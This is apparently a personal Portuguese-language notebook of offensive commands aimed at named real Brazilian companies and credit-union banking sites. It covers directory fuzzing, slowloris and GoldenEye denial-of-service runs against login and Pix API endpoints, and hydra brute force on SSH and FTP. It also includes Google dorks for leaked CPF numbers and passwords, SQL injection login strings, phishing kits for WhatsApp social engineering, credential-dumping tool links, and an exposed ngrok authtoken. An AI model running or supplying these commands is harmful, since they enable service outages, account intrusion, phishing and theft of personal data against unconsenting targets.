sudo ffuf -u contaonline.viacredi.coop.br/indexFUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -mc 200
sudo ffuf -u https://racco.com.br/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -mc 200
sudo ffuf -u https://FUZZ.racco.com.br -c -w /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt 
sudo ffuf -u https://som.milium.com.br/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt 
sudo ffuf -u https://som.milium.com.br/HERE -w /usr/share/seclists/Discovery/Web-Content/big.txt:HERE
sudo ffuf -v -u https://som.milium.com.br/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u https://pixapi.prod.app.ailos.coop.br/ailos/autenticacao/api -mc 200
sudo ffuf -u https://milium.com.br/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fc 403, 301
sudo ffuf -v -u https://som.milium.com.br/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.txt
sudo ffuf -u https://milium.com.br/indexFUZZ -w /usr/share/seclists/Discovery/Web-Content/web-extensions.txt
sudo ffuf -w /usr/share/seclists/raft-large-words.txt -u https://linxcommerce.adapcon.com.br/FUZZ -t 900 -ac -c  ====> CRIAR ATAQUE E COLOCAR USER AGENT.
sudo ffuf -u https://linxcommerce.adapcon.com.br/FUZZ -w /usr/share/seclists/raft-large-words.txt
sudo ffuf -v -w /usr/share/wordlists/dirb/big.txt -u https://contaonline.viacredi.coop.br/FUZZ -mc 200; sudo ffuf -u https://contaonline.viacredi.coop.br/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -mc 200; sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u https://contaonline.viacredi.coop.br/FUZZ -mc 200; sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u https://contaonline.viacredi.coop.br/FUZZ -mc 200; sudo ffuf -u https://contaonline.viacredi.coop.br/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -mc 200; sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u https://contaonline.viacredi.coop.br/FUZZ -mc 200  

sudo ffuf -H "User-Agent: Mozilla/5.0 (****Iphone 14.4 - Safari/7.3***) " -t 350 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words-lowercase.txt -u https://contaonline.viacredi.coop.br/FUZZ -t 900 -ac -c 


#####FFUF – Fuzzing de Ambientes
seq 1 500 | ffuf -u https://www.comprelivro.com/detalhes.php?id=/FUZZ -w /usr/share/wordlists/dirb/big.txt 
seq 1 5000 | sudo ffuf -u https://contaonline.viacredi.coop.br/FUZZ -w /usr/share/wordlists/dirb/big.txt 
sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u http://brcaptura.com.br/FUZZ -mc 200
sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u http://FUZZ.brcaptura.com.br/ -mc 200
sudo wfuzz -c -f sub-fighter.txt -Z -w /usr/share/wordlists/dirb/big.txt --sc 200,202,204,301,302,307,403 http://FUZZ.brcaptura.com.br/
sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u https://bellinatiperez.com.br/FUZZ -mc 200
sudo ffuf -u https://FUZZ. -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 40 -c
sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u https://bellinatiperez.com.br/FUZZ -mc 200
sudo ffuf -u bellinatiperez.com.br -w /usr/share/
seq 1 500 | ffuf -u http://testphp.vulnweb.com/comment.php?aid=/FUZZ -w -
seq 1 500 | ffuf -u http://testphp.vulnweb.com/comment.php?aid=/FUZZ -fs 4735 -w -
sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u https://getnet.brcaptura.com.br/FUZZ -mc 200
sudo ffuf -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) *xx* (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36" -t 3 -w /usr/share/wordlists/dirb/big.txt -u https://www.ailos.coop.br/wp-login.php/FUZZ -mc 503 -v 
sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u https://contaonline.viacredi.coop.br/FUZZ -mc 200

sudo ffuf -u https://pixapi.prod.app.ailos.coop.br/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -mc 200
sudo ffuf -u https://www.mg8.com/FUZZ -w /usr/share/wordlists/dirb/big.txt -mc 200
sudo ffuf -u https://www.mg8.com/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200
sudo ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://FUZZ.mg8.com.br -mc 200
sudo ffuf -w /usr/share/wordlists/dirb/big.txt -u https://FUZZ.mg8.com.br -mc 200
sudo ffuf w /usr/share/dirb/wordlists/big.txt -u https://mg8.com.br/FUZZ -t 100 -mc 200 -o Result_FFUF1.txt
sudo ffuf -w /usr/share/dirb/wordlists/big.txt -u https://FUZZ.mg8.com.br -t 100 -mc 200 -o Result_FFUF2.txt
sudo ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://mg8.com.br/FUZZ -t 100 -mc 200 -o Result_FFUF3.txt 
sudo ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://FUZZ.mg8.com.br -t 100 -mc 200 -o Result_FFUF4.txt
sudo ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://FUZZ.mg8.com.br -t 100 -mc 200 -o Result_FFUF4.txt
sudo ffuf -u https://www.ailos.coop.br/FUZZ -w /usr/share/wordlists/dirb/big.txt 


400 - NÃO EXISTENTE
403 - NÃO PERMITIDO
200 - INTERFACE LOCALIZADA


================================================
GOOGLE DORKS: TOP CONSULTAS
================================================
filetype:env intext:DB_PASSWORD & after:2023-01-01
site:onedrive.live.com shared by
site:docs.google.com intext:cpf
site:docs.google.com intext:senha
filetype:doc "senha" intext:@gmail.com | @hotmail.com | @yahoo.com

####CONSULTAS DE CPF#####
filetype:doc | filetype:txt | filetype:doc intext:"CPF" AND intext:"RG" numrange:00000000000-99999999999
filetype:xls | filetype:txt | filetype:doc intext:"CPF" AND intext:"RG" numrange:00000000000-99999999999 & after:2023-01-01
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml)  intext:"CPF" numrange:00000000000-99999999999
####CONSULTA DE DOCUMENTOS#####
intitle:confidencial (filetype:doc | filetype:docx | filetype:pdf | filetype:xls | filetype:csv) site:.gov.br
intitle:salarios (filetype:doc | filetype:docx | filetype:pdf | filetype:xls | filetype:csv) site:.com.br

intext:"index of /" intitle:”index.of” “parent directory” site:.com.br
intitle:”index.of” “parent directory” site:.com.br
intitle:”index.of” intext:.git site:.com.br
intitle:”index.of” intext:senha site:.com.br
intitle:”Painel de Login” site:.com.br
intitle:"index.of.etc" site:.com.br
login: *password=* filetype:xls

filetype:config inurl:web.config inurl:ftp
###GOOGLE HACKING TOP
intitle:HP LASERJET PRO MFP inurl:/SSI/index.htm
link:*henn.com.br
site:*.com.br intitle:"index of"
intext:+55 intext:(41) numrange:00000-99999 and "-" and numrange:0000-9999 site:instagram.com
intitle:"Index of" and "bd"

inurl:adminpanel site:*.ghelere.com.br
site:pastebin.com "ghelere.com.br"
site:github.com "accesslogistics.com.br"
inurl: http://ftp://ftp site:.ghelere.com.br
inurl: http://ftp://ftp site:dyndns.org

intitle:index.of.etc.passwd
intitle:"index of" config.php
intitle:"index of" filetype:php config
intitle:"index of" wp-config.php
allinurl:admin filetype:mdb
intitle:"intersept" filetype:xls
intitle:"index of" inurl:ftp
filetype:xls inurl:"email.xls"
“Index of” inurl:phpmyadmin
inurl:/wp-content/uploads/ ext:txt “username” AND “password” | “pwd” | “pw”

#################CONSULTA DE BANCO DE DADOS#################
intitle:”index of” “dump.sql” & after:2023-01-01

site:com.br intitle:"?id=1" *.admin.password
site:com.br inurl:".php?id="
site:com.br inurl:"index.php?id="
site:com.br inurl:"news.php?="
################Google Hacking Database#####################
https://www.exploit-db.com/google-hacking-database
https://gbhackers.com/latest-google-dorks-list/


================================================
		TESTES EM SITES SQL INJECTION
================================================

usuário: 'or 1=1--
Senha: ' or 1=1--
'hacker' or true limit 1;#
'hacker' or id=1;#
'hacker' or login='admin';#
'admin' and id='1';#
Teste de Parametros em Aplicações e Duvidas 
https://www.w3schools.com/sql/sql_injection.asp
   '1=1' ou 
 ' or 1=1--
  " or ""="
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
105 or 1=1 
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
105 or 1=1
'hacker' or true limit 1;#
'hacker' or id=1;#
'hacker' or login='admin';#
'admin' and id='1';#
"?id=1" *.admin.password
%7f, %ff
estouros de comprimento de byte; valores máximos de 7 e 8 bits.
-1, outro
Vulnerabilidades de número inteiro e underflow.
%n , %x , %s
Teste de vulnerabilidades de string de formato.
../
Vulnerabilidades de travessia de diretório.
% , _, *
Os caracteres curinga às vezes podem apresentar problemas de DoS ou divulgação de informações.
Ax1024+
  '1=1' ou 
 ' or 1=1--
  " or ""="
  
==============================================
      NEGAÇÃO DE SERVIÇO - STRESS TESTING 
==============================================

SlowHTTPtest
sudo apt install slowhttptest
cd /home/kali/slowloris/;sudo perl slowloris.py -v brcaptura.com.br -s 300 -ua --sleeptime 1
slowhttptest -R -u https://contaonline.viacredi.coop.br/ib/auth -t HEAD -c 1000 -a 10 -b 3000 -r 1500
slowhttptest -R -u www.ferragensnegrao.com.br -t HEAD -c 1000 -a 10 -b 3000 -r 1500
slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u slowhttptest -R -u https://webgiz.aix.com.br/sagradosul/ -t HEAD -c 1000 -a 10 -b 3000 -r 500 -p 3
slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://contaonline.viacredi.coop.br/ib/auth -x 24 -p 2
slowhttptest -c 1000 -H -g -o contatohttp -i 10 -r 200 -t GET -u https://pixapi.prod.app.ailos.coop.br -x 24 -p 3
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 1000 -t GET -u https://www.viacredi.coop.br/sua-cooperativa/sistema-ailos -x 24 -p 3
slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://www.viacredi.coop.br/sua-cooperativa/sistema-ailos -p 3
slowhttptest -R -u https://www.brcaptura.com.br -t HEAD -c 1000 -a 10 -b 3000 -r 500
slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://www.brcaptura.com.br -p 3
slowhttptest -c 500 -H -g -o ./output_file -i 10 -r 200 -t GET -u http://contaonline.viacredi.coop.br -x 24 -p 2
slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://www.viacredi.coop.br -x 24 -p 2
slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://www.viacredi.coop.br -x 24 -p 2
slowhttptest -c 1000 -H -g -o contatohttp -i 10 -r 200 -t GET -u https://pixapi.prod.app.ailos.coop.br -x 24 -p 3

***************************************************************************************************************************
TESTES DE VOLUMENTRIA DE REQUISIÇÕES
***************************************************************************************************************************
sudo brutex malotedigital.unesul.com.br 80
sudo python3 brute.py http://milium.com.br /usr/share/wordlists/dirb/small.txt

###NEGAÇÃO DE SERVIÇO ###GoldenEye  [USAR]
git clone https://github.com/jseidl/GoldenEye.git
cd GoldenEye
sudo ./goldeneye.py https://www.viacredi.coop.br/ -s 1000
sudo ./goldeneye.py https://contaonline.viacredi.coop.br/ -d -s 10 -m random

###NEGAÇÃO DE SERVIÇO
git clone https://github.com/gkbrk/slowloris.git
cd /home/kali/slowloris/; sudo perl slowloris.py -v contaonline.viacredi.coop.br -s 500 -ua --sleeptime 1; sudo perl slowloris.py -v https://apiendpoint.ailos.coop.br/token -s 500 -ua --sleeptime 1; sudo perl slowloris.py -v https://apiendpoint.ailos.coop.br/token -s 1500 -ua --sleeptime 1; sudo perl slowloris.py -v https://apiendpoint.ailos.coop.br/token -s 1500 -ua --sleeptime 1; 
sudo perl slowloris.py -v florenca.com.br -s 500 -ua --sleeptime 1; sudo perl slowloris.py -v florenca.com.br -s 500 -ua --sleeptime 1; sudo perl slowloris.py -v florenca.com.br -s 1500 -ua --sleeptime 1; sudo perl slowloris.py -v educacaoinfantil.aix.com.br -s 1500 -ua --sleeptime 1; 
sudo perl slowloris.py -v isogama.com.br -s 300 -ua --sleeptime 1; sudo perl slowloris.py -v isogama.com.br -s 300 -ua --sleeptime 1; sudo perl slowloris.py -v isogama.com.br -s 300 -ua --sleeptime 1; sudo perl slowloris.py -v isogama.com.br -s 300 -ua --sleeptime 1; 

###BRUTE FORCE SSH
httpx -l brcaptura.txt -p 80,443,81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672
sudo echo brcaptura.com.br | subfinder -silent | sudo httpx -p 80,443,81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672 -o Resultado_httpx.txt

###ATAQUE DE FORÇA BRUTA EM SERVIÇO
sudo hydra -v -t10 -l admin -p /usr/share/dirb/wordlists/big.txt ftp://redesagradosul.com.br -s 2121
sudo hydra -v -t10 -l admin -p /usr/share/dirb/wordlists/big.txt 189.85.67.136 -s 21
sudo hydra -l admin -p /usr/share/dirb/wordlists/big.txt contaonline.viacredi.coop.br ssh -t 64

##Enviar tráfego no modo 'aleatório' com 5 trabalhadores executando 10 conexões cada
sudo ./goldeneye.py https://www.viacredi.coop.br/ -s 1000
cd /home/kali/slowloris/; sudo ./goldeneye.py $rede -d -s 10 -m random

###VERIFICAR IP NO LINUX
curl ifconfig.io

###SHELLPHISH
git clone https://github.com/thelinuxchoice/shellphish-master.zip
/root/Downloads/shellphish-master
./shellphish.sh 

##CRIAR SITE DE REDIRECIONAMENTO
https://bitly.com/

##ALTERAR ENDEREÇO MAC
macchanger -p eth0
machanger -m 00:11:21:33:25:55 eth0

##REALIZAR COLETA
tcpdump -vnw coleta.pcap  

##REALIZAR VISUALIZAÇÃO
tcpdump -vnr coleta.pcap  

##REALIZAR VISUALIZAÇÃO SOMENTE UDEP
tcpdump -vnr coleta.pcap udp

##REALIZAR VISUALIZAÇÃO - HOST
tcpdump -vnr coleta.pcap host 192.168.0.250

##REALIZAR VISUALIZAÇÃO - ORIGEM
tcpdump -vnr coleta.pcap src 192.168.0.250

##REALIZAR VISUALIZAÇÃO - DESTINO
tcpdump -vnr coleta.pcap dst 192.168.0.250

##REALIZAR VISUALIZAÇÃO - HOST e com Destino
tcpdump -vnr coleta.pcap host 192.168.0.250 and dst 192.168.0.200

##REALIZAR VISUALIZAÇÃO - VISUALIZAÇÃO POR PORTA
tcpdump -vnr coleta.pcap port 53

##REALIZAR VISUALIZAÇÃO - VISUALIZAÇÃO POR PORTA
tcpdump -vnr coleta.pcap port 53

##REALIZAR VISUALIZAÇÃO - FILTRO POR SAIDA
tcpdump -vnr coleta.pcap | grep "TEXTO DE BUSCA"

##REALIZAR VISUALIZAÇÃO com filtro por 
tcpdump -vnr coleta.pcap | cut -d " " -f 5 | grep -v testo.que.quer.retirar 

##Discover da Rede Interna
sudo netdiscover

###verificar as vulnerabilidades para o Serviço
searchsploit httpd 2.2.

=============INSTALAR SHERLOCK===========
sudo git clone https://github.com/sherlock-project/sherlock.git
cd sherlock
python3 -m pip install -r requirements.txt
sherlock/ cd sherlock
python3 sherlock.py user1 user2 --print-found

=============SUBIR ENGENHARIA SOCIAL PELO WHATSAPP=============
https://www.youtube.com/watch?v=SM2Sh1TBkYs
sudo ngrok http 8080
cd /sherlock/sherlock/seeker]
sudo ./seeker.py -t manual

##USANDO O CTFR
git clone https://github.com/UnaPibaGeek/ctfr.git
cd ctfr
python3 ctfr.py -d milium.com.br.com.br
python3 ctfr.py -d ciser.com.br -o /home/kali/ctfr/CEASER.txt
https://engenhariade.software/questions/150178/qual-e-melhor-maneira-de-encontrar-subdominios-de-um-dominio


##MAP-Generator - Gera um Mapa Completo do Site
https://requestmap.herokuapp.com/

##Test. Optimize. Repeat.
https://www.webpagetest.org/


================BASE DE VULNERABILIDADES===================
https://www.exploit-db.com/

###SUITE TOOLBOX
https://toolbox.googleapps.com/apps/dig/#ANY/

###DNSLYTICS
https://dnslytics.com/

###GRABIFY
IP LOGGUER TRACK

###VERIFICAR INFORMACOES DA VERSAO DO KALI
apt-get install screenfetch

##GERACAO DE FISHING PARA CELULAR [SAYCHEESE]
git clone https://github.com/thelinuxchoice/saycheese
/saycheese
./saycheese

###SHELLPHISH
git clone https://github.com/thelinuxchoice/shellphish-master.zip
/root/Downloads/shellphish-master
./shellphish.sh 


##VERIFICAR INFORMACOES DA VERSAO DO KALI
apt-get install screenfetch
screenfetch

##GERACAO DE FISHING PARA CELULAR [SAYCHEESE]
git clone https://github.com/thelinuxchoice/saycheese
/saycheese
./saycheese

###SHELLPHISH
git clone https://github.com/thelinuxchoice/shellphish-master.zip
/root/Downloads/shellphish-master
./shellphish.sh 

###Hack windows with VNC Remote Connection payload | Metasploit - Kali linux
https://www.youtube.com/watch?v=8IoOD5xMgbo
https://www.youtube.com/watch?v=y6-_7FXBcpY


###ATUALIZAÇÃO DO AMBIENTE E PACOTES
sudo apt update
sudo apt update && sudo apt full-upgrade -y
sudo apt update && sudo apt upgrade -y


######INSTALAR WALLPAPER KALI
sudo apt install kali-wallpapers-2023
sudo apt install kali-wallpapers-2022

Site para Descriptografar Senhas
https://crackstation.net/

GOOGLE HACKING PARA LOCALIZAR SUBDOMINIOS E INTERFACES ADMS
https://securitytrails.com/blog/google-hacking-techniques

FERRAMENTAS E BOAS PRATICAS DE PENTEST
https://github.com/marroocamp/Recursos-pentest
https://github.com/future-architect/vuls

EXFILTRATION
SharpExfiltrate: https://lnkd.in/d8z-6HK5
DNSExfiltrator: https://lnkd.in/dmX76kqC
Egress-Assess: https://lnkd.in/dKJjhmhY

DUMPING DE CREDENCIAIS
Mimikatz: https://lnkd.in/dPcBT5Fk
Dumpert: https://lnkd.in/dH66FJj4
Lazagne: https://lnkd.in/di8zz_47
Forkatz: https://lnkd.in/de-jtbjY
Pypykatz: https://lnkd.in/dkKequy6
nanodump: https://lnkd.in/dCHhtH3x

========================================================================================
###CONSULTA DE PARTICIPAÇAO DE SOCIOS
https://www.diretoriobrasil.net/

###Visualização de dados públicos de CNPJ
Ferramenta para observar o relacionamento entre empresas e sócios, a partir dos dados públicos disponibilizados pela Receita Federal. Pode ser executado localmente, baixando o código do Github ou executado online diretamente no site do projeto.
https://www.redecnpj.com.br/rede/

==============================================
SPIDERFOOT  INSTALLING & RUNNING
==============================================

 wget https://github.com/smicallef/spiderfoot/archive/v4.0.tar.gz
 tar zxvf v4.0.tar.gz
 cd spiderfoot-4.0
 pip3 install -r requirements.txt
 python3 ./sf.py -l 127.0.0.1:5001

####Retornando Nome Completo CPF/CNPJ
Neste serviço é possível descobrir o nome completo utilizando CPF (Cadastro de Pessoa Física) e/ou CNPJ 
(Cadastro Nacional da Pessoa Jurídica). Bem como, consultar Certidão Eletrônica de Ações Trabalhistas - CEAT. 
Em escolha ao CPNJ poder ser que retorne o CPF como complemento ao nome.
https://sistemas.trt3.jus.br/certidao/feitosTrabalhistas/aba1.emissao.htm

============================================================================================
##########ATIVAR SERVIÇO WEBMAP
============================================================================================
sudo apt update && sudo apt full-upgrade -y
sudo apt install -y docker.io  
sudo systemctl enable docker --now  

ATIVAÇÃO WEBMAP
**************************************************
sudo docker stop webmap
sudo mkdir /tmp/webmap
sudo docker rm webmap
sudo docker run -d \
         --name webmap \
         -h webmap \
         -p 8000:8000 \
         -v /tmp/webmap:/opt/xml \
         reborntc/webmap
	 
sudo docker start webmap
sudo docker exec -ti webmap /root/token
**********************************************

		sudo docker stop webmap
		sudo docker rm webmap

$ # now you can run Nmap and save the XML Report on /tmp/webmap

============================================================================================
###ANALISE DE IPS COLETADOS = SAIDA EM TXT PARA GERAÇÃO DE RELATORIOS COM WEBMAP
============================================================================================
sudo nmap -sT -A -T4 -v -oX /tmp/webmap/HennExt.xml -iL ips.txt --verbose
sudo nmap -sT -A -T4 -v --open --script=vuln -oX /tmp/webmap/HennExt.xml -iL ips.txt --verbose

Now point your browser to http://localhost:8000

Generate new token
In order to access to the WebMap dashboard, you need a token. You can create a new token with:

$ docker exec -ti webmap /root/token

Ativar Servico WEBMAP
$ docker start webmap


Upgrade from previous release
$ # stop running webmap container
$ docker stop webmap

$ # remove webmap container
$ docker rm webmap

$ # pull new image from dockerhub
$ docker pull reborntc/webmap

$ # run WebMap
$ curl -sL http://bit.ly/webmapsetup | bash

============================================================================================
##########ATIVAR SERVIÇO GOPHISH
============================================================================================
cd /opt/phishing
sudo ./gophish
============================================================================================
##########ATIVAR SERVIÇO RENGINE
============================================================================================
sudo apt install -y docker.io            
sudo systemctl enable docker --now  
git clone https://github.com/yogeshojha/rengine && cd rengine
docker start rengine

##RESTART DO SERVIÇO
cd rengine
sudo make restart

user
kali



###GERADOR DE E-MAIL TEMPORARIO
https://temp-mail.org/pt

###CONSULTA DE LISTA DE-MAILS VAZADOS
ext:txt +"@ciser.com.br"

##EDITOR DE TEXTO WEB VSCODE
https://vscode.dev/

https://www.100security.com.br/nerve
docker run -e username="Admin" -e password="Racso@1998" -d -p 80:8080 nerve

Visualization Tools for Investigator
VIS.OCCRP.ORG
cc. ddl

==================================================================================================
instalar Anydesk
==================================================================================================
https://computingforgeeks.com/how-to-install-anydesk-on-kali-linux/?expand_article=1


==================================================================================================
###INSTALAÇÃO OWASPZAP KALI 
==================================================================================================
sudo apt install zaproxy
zap.sh -daemon -quickurl https://som.milium.com.br/ quickout /home/kali/desktop/results.html -quickprogress
htop --> verificar processos redando


==================================================================================================
Kali-Wallpapers
==================================================================================================
https://www.kali.org/tools/kali-wallpapers/
sudo apt install kali-wallpapers-legacy
sudo apt install kali-wallpapers-2022
sudo apt install kali-wallpapers-2023


==================================================================================================
Installing Tor Browser on Kali Linux
==================================================================================================
sudo apt install -y tor torbrowser-launcher
sudo torbrowser-launcher
============================================================================================


==================================================================================================
###INSTALAR NGROK
==================================================================================================
sudo apt install openssh-server
sudo systemctl status ssh
sudo systemctl start ssh
sudo snap install ngrok 
https://dashboard.ngrok.com/tunnels/agents

wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
sudo apt install unzip
unzip ngrok-stable-linux-amd64.zip

ngrok authtoken 2cMDGS6odA1uV0MCYbgZ9Lj5eIZ_7PfPt7jJjRohD7EY87VCH
ngrok tcp 3389
ngrok tcp 3389 --cidr-allow 0.0.0.0/32
./ngrok tcp 9292
0.tcp.sa.ngrok.io
============================================================================================

============================================================================================
######ATIVAR SERVIÇO N.E.R.V.E – Network Exploitation, Reconnaissance & Vulnerability Engine
============================================================================================
REALIZAR ANÁLISE DE VULNERABILIDADES DA REDE INTERNA COM OPENVAS
git clone https://github.com/paytmlabs/Nerve
cd nerve/
ls
sudo docker build -t nerve .
sudo docker run -e username="user" -e password="123456" -d -p 80:8080 nerve
docker start nerve
In your browser, navigate to http://ip.add.re.ss:80 and login with the credentials you specified to in the previous command.


#######Server#########
##Navigate to /opt
cd /opt/
##Clone the repository
git clone git@github.com:PaytmLabs/nerve.git && cd nerve
##Run Installer (requires root)
bash install/setup.sh
##Check NERVE is running
systemctl status nerve
In your browser, navigate to http://ip.add.re.ss:8080 and use the credentials printed in your terminal.
============================================================================================
 

==================================================================================================
###INSTALAR VNC
==================================================================================================
apt-get update && upgrade
apt-get install x11vnc
##Criar o Password
x11vnc -storepasswd
###Iniciar o VNC Server
x11vnc -ncache 10 -auth guess -nap -forever -loop -repeat -rfbauth /root/.vnc/passwd -rfbport 5900 -noncache

==================================================================================================
###INSTALAR NGROK
==================================================================================================
curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null && echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | sudo tee /etc/apt/sources.list.d/ngrok.list && sudo apt update && sudo apt install ngrok
##REGISTRO NO WINDOWS
ngrok authtoken 2cMDGS6odA1uV0MCYbgZ9Lj5eIZ_7PfPt7jJjRohD7EY87VCH
ngrok tcp 3389
##REGISTRO NO LINUX
ngrok config add-authtoken 2cMDGS6odA1uV0MCYbgZ9Lj5eIZ_7PfPt7jJjRohD7EY87VCH
ngrok http 80


git clone https://github.com/IHA089/URLHider.git
sudo pip install -r requirements.txt




##Analise de Principais Portas respondendo em Aplicações nos Subidominios Encontrados --> Resultado_HTTPX.txt
git clone https://github.com/projectdiscovery/httpx.git
cd httpx/cmd/httpx
go build .
mv httpx /usr/local/bin/
httpx -h
sudo echo ghelere.com.br | sudo subfinder -silent | sudo httpx -sc -p 22,23,21,24,25,80,443,81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,5900,6543,7000,7001,7396,7474,8000,8001,8008,8010,8020,8040,8050,2222,33389,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672 -o Resultado_HTTPX.txt
sudo echo dynamox.net | sudo subfinder -silent | sudo httpx -sc -td -fr -lc -wc -ss -p 22,23,21,24,25,80,443,81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,5900,6543,7000,7001,7396,7474,8000,8001,8008,8010,8020,8040,8050,2222,33389,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672 -o Resultado_HTTPX.txt
-l lista.txt
httpx -title -sc -td -fr -lc -wc -ss